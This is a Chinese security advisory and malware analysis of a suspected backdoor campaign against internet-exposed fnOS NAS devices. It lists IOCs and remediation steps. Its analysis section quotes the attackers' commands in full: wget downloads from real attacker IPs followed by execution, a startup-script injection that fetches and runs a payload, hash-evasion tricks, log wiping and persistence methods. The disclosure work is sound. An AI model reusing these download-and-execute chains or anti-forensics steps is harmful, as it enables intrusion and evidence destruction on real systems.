重要/漏洞：飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件漏洞编号：暂无（官方未公开 / 未分配 CVE）重要等级：严重（高危）CVSS 分数：暂无影响范围：fnOS 设备存在公网可达入口（端口映射/反代/直连公网）时风险显著上升；官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止

重要/漏洞：飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件

漏洞编号：暂无（官方未公开 / 未分配 CVE）
重要等级：严重（高危）
CVSS 分数：暂无

影响范围：
fnOS 设备存在公网可达入口（端口映射/反代/直连公网）时风险显著上升；官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象，说明风险不应仅限定为 HTTP 明文通道（可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发）

受影响系统：
fnOS（版本范围未公开）。官方社区回复称该问题官方已知，建议升级至 1.1.15，并在关闭公网端口映射后验证异常上传/连接是否停止。

木马行为分析
目前LoopDNS频道编辑已获取相关木马文件，下为行为分析

1. 入侵者在通过未公开入口/利用链投放后门下载器后并执行
下载二阶段载荷并执行（观测到的命令链）

cd /tmp
wget http://20.89.168.131/nginx
chmod 777 nginx
head -c 16 /dev/urandom >> nginx（向文件追加随机字节，改变哈希，规避基于哈希的检测）
./nginx
wget http://20.89.168.131/trim_https_cgi
chmod 777 trim_https_cgi
head -c 16 /dev/urandom >> trim_https_cgi
./trim_https_cgi
外联与拉取补充组件
HTTP：GET http://151.240.13.91/trim_fnos
TCP：连接 45.95.212.102:6608

2.后门驻留组件 gots

A1. 写入后门主体与持久化文件

创建/写入：/sbin/gots
创建/写入：/etc/rc.local、/etc/rc.d/rc.local
创建/写入 systemd 服务（变种服务名）：
/etc/systemd/system/x86.service
/etc/systemd/system/<sha256>.service
执行持久化：systemctl enable <service>.service（含重定向到 /dev/null 的静默执行）
自身复制/改名落地：
/usr/bin/x86（样本发生目录重命名/落地）
/usr/bin/<sha256>（样本发生目录重命名/落地）

A2. C2 通信与探测

DNS：解析 aura.kabot.icu -> 45.95.212.102
TCP：连接 45.95.212.102 多端口（观测到：3489、5098、6608、7489）
论坛样本显示的附加行为（strings/排查结论）
干扰系统工具：重命名/替换 cat（出现 mv /usr/bin/cat /usr/bin/cat2 等字符串，导致“cat 丢失”现象）
结束系统进程：pkill -f 'network_service|resmon_service'
修改持久化入口：改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable
外联：包含 45.95.212.102 字符串并进行访问

3. 组件 trim_https_cgi

清理痕迹

清空多目录日志：/var/log/*、/usr/trim/logs/*、/run/log/journal 等
删除审计日志：/var/log/audit/audit.log 及滚动文件
删除/清理安全相关日志：/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等

干扰业务与恢复功能

结束服务：pkill -f backup_service、pkill -f sysrestore_service 等

二阶段下载执行与启动脚本注入

修改 /usr/trim/bin/system_startup.sh，追加下载执行链：
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
端口相关痕迹与疑似隐藏监听（来源于论坛排查）
目标系统存在 0.0.0.0:57132 LISTEN，ss/netstat 无 PID，lsof/fuser 无结果
trim_https_cgi 字符串包含 57132，并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑（提示该端口为其链路的一部分）

4.内核模块 snd_pcap（论坛排查）

/etc/modules 被追加 snd_pcap
模块文件：/lib/modules/6.12.18-trim/snd_pcap.ko
与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑（疑似内核层隐藏/驻留能力）

关键落地痕迹

不可变属性（immutable，需先 chattr -i 才能删除）：

/usr/bin/nginx
/usr/sbin/gots
/usr/trim/bin/trim_https_cgi
/etc/systemd/system/nginx.service
/etc/systemd/system/trim_https_cgi.service
/etc/rc.local

伪装/复用：/usr/bin/nginx 与 /usr/sbin/gots md5 相同（同一载荷多名称投放）
rc.local 自启：/sbin/gots x86 &
systemd 自启（示例）：ExecStart=/usr/bin/nginx x86（oneshot + enable）

可疑网络基础设施（IOC）

IP：45[.]95[.]212[.]102（C2/多端口连接）
IP：151[.]240[.]13[.]91（HTTP 拉取二阶段：/trim_fnos、论坛样本）
域名：aura[.]kabot[.]icu（解析到 45[.]95[.]212[.]102）
下载源：20[.]89[.]168[.]131（HTTP 拉取：/nginx、/trim_https_cgi）
归属信息：45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554 ISIF OU 提供商网段

处置建议
1. 关闭公网端口映射/源站直通。
2. 升级 fnOS 至官方建议版本（1.1.15 或更高）。
3. 出口防火墙封禁：45.95.212.102、151.240.13.91，同时监控连接数与上传是否回落。
4. 轮换所有管理口令/密钥；检查容器、计划任务、数据盘是否存在触发残留（官方提示“重装后仍可能再次触发”）。

参考来源：飞牛社区